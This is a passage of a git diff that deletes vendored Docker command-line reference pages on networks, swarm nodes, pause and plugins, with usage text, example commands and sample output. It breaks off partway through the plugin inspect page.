-```bash
-$ docker network ls --filter name=foo
-NETWORK ID          NAME                DRIVER       SCOPE
-95e74588f40d        foo                 bridge       local
-06e7eef0a170        foobar              bridge       local
-```
-
-#### Type
-
-The `type` filter supports two values; `builtin` displays predefined networks
-(`bridge`, `none`, `host`), whereas `custom` displays user defined networks.
-
-The following filter matches all user defined networks:
-
-```bash
-$ docker network ls --filter type=custom
-NETWORK ID          NAME                DRIVER       SCOPE
-95e74588f40d        foo                 bridge       local  
-63d1ff1f77b0        dev                 bridge       local
-```
-
-By having this flag it allows for batch cleanup. For example, use this filter
-to delete all user defined networks:
-
-```bash
-$ docker network rm `docker network ls --filter type=custom -q`
-```
-
-A warning will be issued when trying to remove a network that has containers
-attached.
-
-## Formatting
-
-The formatting options (`--format`) pretty-prints networks output
-using a Go template.
-
-Valid placeholders for the Go template are listed below:
-
-Placeholder | Description
-------------|------------------------------------------------------------------------------------------
-`.ID`       | Network ID
-`.Name`     | Network name
-`.Driver`   | Network driver
-`.Scope`    | Network scope (local, global)
-`.IPv6`     | Whether IPv6 is enabled on the network or not.
-`.Internal` | Whether the network is internal or not.
-`.Labels`   | All labels assigned to the network.
-`.Label`    | Value of a specific label for this network. For example `{{.Label "project.version"}}`
-
-When using the `--format` option, the `network ls` command will either
-output the data exactly as the template declares or, when using the
-`table` directive, includes column headers as well.
-
-The following example uses a template without headers and outputs the
-`ID` and `Driver` entries separated by a colon for all networks:
-
-```bash
-$ docker network ls --format "{{.ID}}: {{.Driver}}"
-afaaab448eb2: bridge
-d1584f8dc718: host
-391df270dc66: null
-```
-
-## Related information
-
-* [network disconnect ](network_disconnect.md)
-* [network connect](network_connect.md)
-* [network create](network_create.md)
-* [network inspect](network_inspect.md)
-* [network rm](network_rm.md)
-* [network prune](network_prune.md)
-* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md
deleted file mode 100644
index 5b65465600..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md
+++ /dev/null
@@ -1,45 +0,0 @@
----
-title: "network prune"
-description: "Remove unused networks"
-keywords: "network, prune, delete"
----
-
-# network prune
-
-```markdown
-Usage:	docker network prune [OPTIONS]
-
-Remove all unused networks
-
-Options:
-  -f, --force   Do not prompt for confirmation
-      --help    Print usage
-```
-
-Remove all unused networks. Unused networks are those which are not referenced by any containers.
-
-Example output:
-
-```bash
-$ docker network prune
-WARNING! This will remove all networks not used by at least one container.
-Are you sure you want to continue? [y/N] y
-Deleted Networks:
-n1
-n2
-```
-
-## Related information
-
-* [network disconnect ](network_disconnect.md)
-* [network connect](network_connect.md)
-* [network create](network_create.md)
-* [network ls](network_ls.md)
-* [network inspect](network_inspect.md)
-* [network rm](network_rm.md)
-* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/)
-* [system df](system_df.md)
-* [container prune](container_prune.md)
-* [image prune](image_prune.md)
-* [volume prune](volume_prune.md)
-* [system prune](system_prune.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md
deleted file mode 100644
index f06b4c002d..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md
+++ /dev/null
@@ -1,59 +0,0 @@
----
-title: "network rm"
-description: "the network rm command description and usage"
-keywords: "network, rm, user-defined"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# network rm
-
-```markdown
-Usage:  docker network rm NETWORK [NETWORK...]
-
-Remove one or more networks
-
-Aliases:
-  rm, remove
-
-Options:
-      --help   Print usage
-```
-
-Removes one or more networks by name or identifier. To remove a network,
-you must first disconnect any containers connected to it.
-To remove the network named 'my-network':
-
-```bash
-  $ docker network rm my-network
-```
-
-To delete multiple networks in a single `docker network rm` command, provide
-multiple network names or ids. The following example deletes a network with id
-`3695c422697f` and a network named `my-network`:
-
-```bash
-  $ docker network rm 3695c422697f my-network
-```
-
-When you specify multiple networks, the command attempts to delete each in turn.
-If the deletion of one network fails, the command continues to the next on the
-list and tries to delete that. The command reports success or failure for each
-deletion.
-
-## Related information
-
-* [network disconnect ](network_disconnect.md)
-* [network connect](network_connect.md)
-* [network create](network_create.md)
-* [network ls](network_ls.md)
-* [network inspect](network_inspect.md)
-* [network prune](network_prune.md)
-* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md
deleted file mode 100644
index 9a81bb9c04..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md
+++ /dev/null
@@ -1,42 +0,0 @@
----
-title: "node demote"
-description: "The node demote command description and usage"
-keywords: "node, demote"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# node demote
-
-```markdown
-Usage:  docker node demote NODE [NODE...]
-
-Demote one or more nodes from manager in the swarm
-
-Options:
-      --help   Print usage
-
-```
-
-Demotes an existing manager so that it is no longer a manager. This command targets a docker engine that is a manager in the swarm.
-
-
-```bash
-$ docker node demote <node name>
-```
-
-## Related information
-
-* [node inspect](node_inspect.md)
-* [node ls](node_ls.md)
-* [node promote](node_promote.md)
-* [node ps](node_ps.md)
-* [node rm](node_rm.md)
-* [node update](node_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md
deleted file mode 100644
index fac688fe40..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md
+++ /dev/null
@@ -1,137 +0,0 @@
----
-title: "node inspect"
-description: "The node inspect command description and usage"
-keywords: "node, inspect"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# node inspect
-
-```markdown
-Usage:  docker node inspect [OPTIONS] self|NODE [NODE...]
-
-Display detailed information on one or more nodes
-
-Options:
-  -f, --format string   Format the output using the given Go template
-      --help            Print usage
-      --pretty          Print the information in a human friendly format.
-```
-
-Returns information about a node. By default, this command renders all results
-in a JSON array. You can specify an alternate format to execute a
-given template for each result. Go's
-[text/template](http://golang.org/pkg/text/template/) package describes all the
-details of the format.
-
-Example output:
-
-    $ docker node inspect swarm-manager
-    [
-    {
-        "ID": "e216jshn25ckzbvmwlnh5jr3g",
-        "Version": {
-            "Index": 10
-        },
-        "CreatedAt": "2016-06-16T22:52:44.9910662Z",
-        "UpdatedAt": "2016-06-16T22:52:45.230878043Z",
-        "Spec": {
-            "Role": "manager",
-            "Availability": "active"
-        },
-        "Description": {
-            "Hostname": "swarm-manager",
-            "Platform": {
-                "Architecture": "x86_64",
-                "OS": "linux"
-            },
-            "Resources": {
-                "NanoCPUs": 1000000000,
-                "MemoryBytes": 1039843328
-            },
-            "Engine": {
-                "EngineVersion": "1.12.0",
-                "Plugins": [
-                    {
-                        "Type": "Volume",
-                        "Name": "local"
-                    },
-                    {
-                        "Type": "Network",
-                        "Name": "overlay"
-                    },
-                    {
-                        "Type": "Network",
-                        "Name": "null"
-                    },
-                    {
-                        "Type": "Network",
-                        "Name": "host"
-                    },
-                    {
-                        "Type": "Network",
-                        "Name": "bridge"
-                    },
-                    {
-                        "Type": "Network",
-                        "Name": "overlay"
-                    }
-                ]
-            }
-        },
-        "Status": {
-            "State": "ready",
-            "Addr": "168.0.32.137"
-        },
-        "ManagerStatus": {
-            "Leader": true,
-            "Reachability": "reachable",
-            "Addr": "168.0.32.137:2377"
-        }
-    }
-    ]
-
-    {% raw %}
-    $ docker node inspect --format '{{ .ManagerStatus.Leader }}' self
-    false
-    {% endraw %}
-
-    $ docker node inspect --pretty self
-    ID:                     e216jshn25ckzbvmwlnh5jr3g
-    Hostname:               swarm-manager
-    Joined at:              2016-06-16 22:52:44.9910662 +0000 utc
-    Status:
-     State:                 Ready
-     Availability:          Active
-     Address:               172.17.0.2
-    Manager Status:
-     Address:               172.17.0.2:2377
-     Raft Status:           Reachable
-     Leader:                Yes
-    Platform:
-     Operating System:      linux
-     Architecture:          x86_64
-    Resources:
-     CPUs:                  4
-     Memory:                7.704 GiB
-    Plugins:
-      Network:              overlay, bridge, null, host, overlay
-      Volume:               local
-    Engine Version:         1.12.0
-
-## Related information
-
-* [node demote](node_demote.md)
-* [node ls](node_ls.md)
-* [node promote](node_promote.md)
-* [node ps](node_ps.md)
-* [node rm](node_rm.md)
-* [node update](node_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md
deleted file mode 100644
index 5f61713c2e..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md
+++ /dev/null
@@ -1,130 +0,0 @@
----
-title: "node ls"
-description: "The node ls command description and usage"
-keywords: "node, list"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# node ls
-
-```markdown
-Usage:  docker node ls [OPTIONS]
-
-List nodes in the swarm
-
-Aliases:
-  ls, list
-
-Options:
-  -f, --filter value   Filter output based on conditions provided
-      --help           Print usage
-  -q, --quiet          Only display IDs
-```
-
-Lists all the nodes that the Docker Swarm manager knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options.
-
-Example output:
-
-```bash
-$ docker node ls
-
-ID                           HOSTNAME        STATUS  AVAILABILITY  MANAGER STATUS
-1bcef6utixb0l0ca7gxuivsj0    swarm-worker2   Ready   Active
-38ciaotwjuritcdtn9npbnkuz    swarm-worker1   Ready   Active
-e216jshn25ckzbvmwlnh5jr3g *  swarm-manager1  Ready   Active        Leader
-```
-
-## Filtering
-
-The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more
-than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`)
-
-The currently supported filters are:
-
-* [id](node_ls.md#id)
-* [label](node_ls.md#label)
-* [membership](node_ls.md#membership)
-* [name](node_ls.md#name)
-* [role](node_ls.md#role)
-
-#### ID
-
-The `id` filter matches all or part of a node's id.
-
-```bash
-$ docker node ls -f id=1
-
-ID                         HOSTNAME       STATUS  AVAILABILITY  MANAGER STATUS
-1bcef6utixb0l0ca7gxuivsj0  swarm-worker2  Ready   Active
-```
-
-#### Label
-
-The `label` filter matches nodes based on engine labels and on the presence of a `label` alone or a `label` and a value. Node labels are currently not used for filtering.
-
-The following filter matches nodes with the `foo` label regardless of its value.
-
-```bash
-$ docker node ls -f "label=foo"
-
-ID                         HOSTNAME       STATUS  AVAILABILITY  MANAGER STATUS
-1bcef6utixb0l0ca7gxuivsj0  swarm-worker2  Ready   Active
-```
-
-#### Membership
-
-The `membership` filter matches nodes based on the presence of a `membership` and a value
-`accepted` or `pending`.
-
-The following filter matches nodes with the `membership` of `accepted`.
-
-```bash
-$ docker node ls -f "membership=accepted"
-
-ID                           HOSTNAME        STATUS  AVAILABILITY  MANAGER STATUS
-1bcef6utixb0l0ca7gxuivsj0    swarm-worker2   Ready   Active
-38ciaotwjuritcdtn9npbnkuz    swarm-worker1   Ready   Active
-```
-
-#### Name
-
-The `name` filter matches on all or part of a node hostname.
-
-The following filter matches the nodes with a name equal to `swarm-master` string.
-
-```bash
-$ docker node ls -f name=swarm-manager1
-
-ID                           HOSTNAME        STATUS  AVAILABILITY  MANAGER STATUS
-e216jshn25ckzbvmwlnh5jr3g *  swarm-manager1  Ready   Active        Leader
-```
-
-#### Role
-
-The `role` filter matches nodes based on the presence of a `role` and a value `worker` or `manager`.
-
-The following filter matches nodes with the `manager` role.
-
-```bash
-$ docker node ls -f "role=manager"
-
-ID                           HOSTNAME        STATUS  AVAILABILITY  MANAGER STATUS
-e216jshn25ckzbvmwlnh5jr3g *  swarm-manager1  Ready   Active        Leader
-```
-
-## Related information
-
-* [node demote](node_demote.md)
-* [node inspect](node_inspect.md)
-* [node promote](node_promote.md)
-* [node ps](node_ps.md)
-* [node rm](node_rm.md)
-* [node update](node_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md
deleted file mode 100644
index 92092a8935..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md
+++ /dev/null
@@ -1,41 +0,0 @@
----
-title: "node promote"
-description: "The node promote command description and usage"
-keywords: "node, promote"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# node promote
-
-```markdown
-Usage:  docker node promote NODE [NODE...]
-
-Promote one or more nodes to manager in the swarm
-
-Options:
-      --help   Print usage
-```
-
-Promotes a node to manager. This command targets a docker engine that is a manager in the swarm.
-
-
-```bash
-$ docker node promote <node name>
-```
-
-## Related information
-
-* [node demote](node_demote.md)
-* [node inspect](node_inspect.md)
-* [node ls](node_ls.md)
-* [node ps](node_ps.md)
-* [node rm](node_rm.md)
-* [node update](node_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md
deleted file mode 100644
index 7f07c5ea64..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md
+++ /dev/null
@@ -1,107 +0,0 @@
----
-title: "node ps"
-description: "The node ps command description and usage"
-keywords: node, tasks, ps
-aliases: ["/engine/reference/commandline/node_tasks/"]
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# node ps
-
-```markdown
-Usage:  docker node ps [OPTIONS] [NODE...]
-
-List tasks running on one or more nodes, defaults to current node.
-
-Options:
-  -f, --filter value   Filter output based on conditions provided
-      --help           Print usage
-      --no-resolve     Do not map IDs to Names
-      --no-trunc       Do not truncate output
-```
-
-Lists all the tasks on a Node that Docker knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options.
-
-Example output:
-
-    $ docker node ps swarm-manager1
-    NAME                                IMAGE        NODE            DESIRED STATE  CURRENT STATE
-    redis.1.7q92v0nr1hcgts2amcjyqg3pq   redis:3.0.6  swarm-manager1  Running        Running 5 hours
-    redis.6.b465edgho06e318egmgjbqo4o   redis:3.0.6  swarm-manager1  Running        Running 29 seconds
-    redis.7.bg8c07zzg87di2mufeq51a2qp   redis:3.0.6  swarm-manager1  Running        Running 5 seconds
-    redis.9.dkkual96p4bb3s6b10r7coxxt   redis:3.0.6  swarm-manager1  Running        Running 5 seconds
-    redis.10.0tgctg8h8cech4w0k0gwrmr23  redis:3.0.6  swarm-manager1  Running        Running 5 seconds
-
-
-## Filtering
-
-The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more
-than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`)
-
-The currently supported filters are:
-
-* [name](#name)
-* [id](#id)
-* [label](#label)
-* [desired-state](#desired-state)
-
-#### name
-
-The `name` filter matches on all or part of a task's name.
-
-The following filter matches all tasks with a name containing the `redis` string.
-
-    $ docker node ps -f name=redis swarm-manager1
-    NAME                                IMAGE        NODE            DESIRED STATE  CURRENT STATE
-    redis.1.7q92v0nr1hcgts2amcjyqg3pq   redis:3.0.6  swarm-manager1  Running        Running 5 hours
-    redis.6.b465edgho06e318egmgjbqo4o   redis:3.0.6  swarm-manager1  Running        Running 29 seconds
-    redis.7.bg8c07zzg87di2mufeq51a2qp   redis:3.0.6  swarm-manager1  Running        Running 5 seconds
-    redis.9.dkkual96p4bb3s6b10r7coxxt   redis:3.0.6  swarm-manager1  Running        Running 5 seconds
-    redis.10.0tgctg8h8cech4w0k0gwrmr23  redis:3.0.6  swarm-manager1  Running        Running 5 seconds
-
-
-#### id
-
-The `id` filter matches a task's id.
-
-    $ docker node ps -f id=bg8c07zzg87di2mufeq51a2qp swarm-manager1
-    NAME                                IMAGE        NODE            DESIRED STATE  CURRENT STATE
-    redis.7.bg8c07zzg87di2mufeq51a2qp   redis:3.0.6  swarm-manager1  Running        Running 5 seconds
-
-
-#### label
-
-The `label` filter matches tasks based on the presence of a `label` alone or a `label` and a
-value.
-
-The following filter matches tasks with the `usage` label regardless of its value.
-
-```bash
-$ docker node ps -f "label=usage"
-NAME                               IMAGE        NODE            DESIRED STATE  CURRENT STATE
-redis.6.b465edgho06e318egmgjbqo4o  redis:3.0.6  swarm-manager1  Running        Running 10 minutes
-redis.7.bg8c07zzg87di2mufeq51a2qp  redis:3.0.6  swarm-manager1  Running        Running 9 minutes
-```
-
-
-#### desired-state
-
-The `desired-state` filter can take the values `running`, `shutdown`, and `accepted`.
-
-
-## Related information
-
-* [node demote](node_demote.md)
-* [node inspect](node_inspect.md)
-* [node ls](node_ls.md)
-* [node promote](node_promote.md)
-* [node rm](node_rm.md)
-* [node update](node_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md
deleted file mode 100644
index b245d636cc..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md
+++ /dev/null
@@ -1,73 +0,0 @@
----
-title: "node rm"
-description: "The node rm command description and usage"
-keywords: "node, remove"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# node rm
-
-```markdown
-Usage:	docker node rm [OPTIONS] NODE [NODE...]
-
-Remove one or more nodes from the swarm
-
-Aliases:
-  rm, remove
-
-Options:
-  -f, --force   Force remove a node from the swarm
-      --help    Print usage
-```
-
-When run from a manager node, removes the specified nodes from a swarm.
-
-
-Example output:
-
-```nohighlight
-$ docker node rm swarm-node-02
-
-Node swarm-node-02 removed from swarm
-```
-
-Removes the specified nodes from the swarm, but only if the nodes are in the
-down state. If you attempt to remove an active node you will receive an error:
-
-```nohighlight
-$ docker node rm swarm-node-03
-
-Error response from daemon: rpc error: code = 9 desc = node swarm-node-03 is not
-down and can't be removed
-```
-
-If you lose access to a worker node or need to shut it down because it has been
-compromised or is not behaving as expected, you can use the `--force` option.
-This may cause transient errors or interruptions, depending on the type of task
-being run on the node.
-
-```nohighlight
-$ docker node rm --force swarm-node-03
-
-Node swarm-node-03 removed from swarm
-```
-
-A manager node must be demoted to a worker node (using `docker node demote`)
-before you can remove it from the swarm.
-
-## Related information
-
-* [node demote](node_demote.md)
-* [node inspect](node_inspect.md)
-* [node ls](node_ls.md)
-* [node promote](node_promote.md)
-* [node ps](node_ps.md)
-* [node update](node_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md
deleted file mode 100644
index aa65d0309e..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md
+++ /dev/null
@@ -1,71 +0,0 @@
----
-title: "node update"
-description: "The node update command description and usage"
-keywords: "resources, update, dynamically"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-## update
-
-```markdown
-Usage:  docker node update [OPTIONS] NODE
-
-Update a node
-
-Options:
-      --availability string   Availability of the node (active/pause/drain)
-      --help                  Print usage
-      --label-add value       Add or update a node label (key=value) (default [])
-      --label-rm value        Remove a node label if exists (default [])
-      --role string           Role of the node (worker/manager)
-```
-
-### Add label metadata to a node
-
-Add metadata to a swarm node using node labels. You can specify a node label as
-a key with an empty value:
-
-``` bash
-$ docker node update --label-add foo worker1
-```
-
-To add multiple labels to a node, pass the `--label-add` flag for each label:
-
-``` bash
-$ docker node update --label-add foo --label-add bar worker1
-```
-
-When you [create a service](service_create.md),
-you can use node labels as a constraint. A constraint limits the nodes where the
-scheduler deploys tasks for a service.
-
-For example, to add a `type` label to identify nodes where the scheduler should
-deploy message queue service tasks:
-
-``` bash
-$ docker node update --label-add type=queue worker1
-```
-
-The labels you set for nodes using `docker node update` apply only to the node
-entity within the swarm. Do not confuse them with the docker daemon labels for
-[dockerd](https://docs.docker.com/engine/userguide/labels-custom-metadata/#daemon-labels).
-
-For more information about labels, refer to [apply custom
-metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/).
-
-## Related information
-
-* [node demote](node_demote.md)
-* [node inspect](node_inspect.md)
-* [node ls](node_ls.md)
-* [node promote](node_promote.md)
-* [node ps](node_ps.md)
-* [node rm](node_rm.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/pause.md b/vendor/github.com/docker/docker/docs/reference/commandline/pause.md
deleted file mode 100644
index e2dd800d5f..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/pause.md
+++ /dev/null
@@ -1,40 +0,0 @@
----
-title: "pause"
-description: "The pause command description and usage"
-keywords: "cgroups, container, suspend, SIGSTOP"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# pause
-
-```markdown
-Usage:  docker pause CONTAINER [CONTAINER...]
-
-Pause all processes within one or more containers
-
-Options:
-      --help   Print usage
-```
-
-The `docker pause` command suspends all processes in the specified containers.
-On Linux, this uses the cgroups freezer. Traditionally, when suspending a process
-the `SIGSTOP` signal is used, which is observable by the process being suspended.
-With the cgroups freezer the process is unaware, and unable to capture,
-that it is being suspended, and subsequently resumed. On Windows, only Hyper-V
-containers can be paused.
-
-See the
-[cgroups freezer documentation](https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt)
-for further details.
-
-## Related information
-
-* [unpause](unpause.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md
deleted file mode 100644
index 9d4e99e56a..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md
+++ /dev/null
@@ -1,60 +0,0 @@
----
-title: "plugin create"
-description: "the plugin create command description and usage"
-keywords: "plugin, create"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# plugin create
-
-```markdown
-Usage:  docker plugin create [OPTIONS] PLUGIN PLUGIN-DATA-DIR
-
-Create a plugin from a rootfs and configuration. Plugin data directory must contain config.json and rootfs directory.
-
-Options:
-      --compress   Compress the context using gzip 
-      --help       Print usage
-```
-
-Creates a plugin. Before creating the plugin, prepare the plugin's root filesystem as well as
-[the config.json](../../extend/config.md)
-
-
-The following example shows how to create a sample `plugin`.
-
-```bash
-
-$ ls -ls /home/pluginDir
-
-4 -rw-r--r--  1 root root 431 Nov  7 01:40 config.json
-0 drwxr-xr-x 19 root root 420 Nov  7 01:40 rootfs
-
-$ docker plugin create plugin /home/pluginDir
-plugin
-
-NAME                  	TAG                 DESCRIPTION                  ENABLED
-plugin                  latest              A sample plugin for Docker   true
-```
-
-The plugin can subsequently be enabled for local use or pushed to the public registry.
-
-## Related information
-
-* [plugin disable](plugin_disable.md)
-* [plugin enable](plugin_enable.md)
-* [plugin inspect](plugin_inspect.md)
-* [plugin install](plugin_install.md)
-* [plugin ls](plugin_ls.md)
-* [plugin push](plugin_push.md)
-* [plugin rm](plugin_rm.md)
-* [plugin set](plugin_set.md)
-* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md
deleted file mode 100644
index 451f1ace9c..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md
+++ /dev/null
@@ -1,66 +0,0 @@
----
-title: "plugin disable"
-description: "the plugin disable command description and usage"
-keywords: "plugin, disable"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# plugin disable
-
-```markdown
-Usage:  docker plugin disable [OPTIONS] PLUGIN
-
-Disable a plugin
-
-Options:
-  -f, --force   Force the disable of an active plugin
-      --help    Print usage
-```
-
-Disables a plugin. The plugin must be installed before it can be disabled,
-see [`docker plugin install`](plugin_install.md). Without the `-f` option,
-a plugin that has references (eg, volumes, networks) cannot be disabled.
-
-
-The following example shows that the `sample-volume-plugin` plugin is installed
-and enabled:
-
-```bash
-$ docker plugin ls
-
-ID                  NAME                             TAG                 DESCRIPTION                ENABLED
-69553ca1d123        tiborvass/sample-volume-plugin   latest              A test plugin for Docker   true
-```
-
-To disable the plugin, use the following command:
-
-```bash
-$ docker plugin disable tiborvass/sample-volume-plugin
-
-tiborvass/sample-volume-plugin
-
-$ docker plugin ls
-
-ID                  NAME                             TAG                 DESCRIPTION                ENABLED
-69553ca1d123        tiborvass/sample-volume-plugin   latest              A test plugin for Docker   false
-```
-
-## Related information
-
-* [plugin create](plugin_create.md)
-* [plugin enable](plugin_enable.md)
-* [plugin inspect](plugin_inspect.md)
-* [plugin install](plugin_install.md)
-* [plugin ls](plugin_ls.md)
-* [plugin push](plugin_push.md)
-* [plugin rm](plugin_rm.md)
-* [plugin set](plugin_set.md)
-* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md
deleted file mode 100644
index df8bee3af5..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md
+++ /dev/null
@@ -1,65 +0,0 @@
----
-title: "plugin enable"
-description: "the plugin enable command description and usage"
-keywords: "plugin, enable"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# plugin enable
-
-```markdown
-Usage:  docker plugin enable [OPTIONS] PLUGIN
-
-Enable a plugin
-
-Options:
-      --help          Print usage
-      --timeout int   HTTP client timeout (in seconds)
-```
-
-Enables a plugin. The plugin must be installed before it can be enabled,
-see [`docker plugin install`](plugin_install.md).
-
-
-The following example shows that the `sample-volume-plugin` plugin is installed,
-but disabled:
-
-```bash
-$ docker plugin ls
-
-ID                  NAME                             TAG                 DESCRIPTION                ENABLED
-69553ca1d123        tiborvass/sample-volume-plugin   latest              A test plugin for Docker   false
-```
-
-To enable the plugin, use the following command:
-
-```bash
-$ docker plugin enable tiborvass/sample-volume-plugin
-
-tiborvass/sample-volume-plugin
-
-$ docker plugin ls
-
-ID                  NAME                             TAG                 DESCRIPTION                ENABLED
-69553ca1d123        tiborvass/sample-volume-plugin   latest              A test plugin for Docker   true
-```
-
-## Related information
-
-* [plugin create](plugin_create.md)
-* [plugin disable](plugin_disable.md)
-* [plugin inspect](plugin_inspect.md)
-* [plugin install](plugin_install.md)
-* [plugin ls](plugin_ls.md)
-* [plugin push](plugin_push.md)
-* [plugin rm](plugin_rm.md)
-* [plugin set](plugin_set.md)
-* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md
deleted file mode 100644
index fdcc030c43..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md
+++ /dev/null
@@ -1,164 +0,0 @@
----
-title: "plugin inspect"
-description: "The plugin inspect command description and usage"
-keywords: "plugin, inspect"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# plugin inspect
-
-```markdown
-Usage:	docker plugin inspect [OPTIONS] PLUGIN [PLUGIN...]
-
-Display detailed information on one or more plugins
-
-Options:
-  -f, --format string   Format the output using the given Go template
-      --help            Print usage
-```
-
-Returns information about a plugin. By default, this command renders all results
-in a JSON array.
-
-Example output:
-
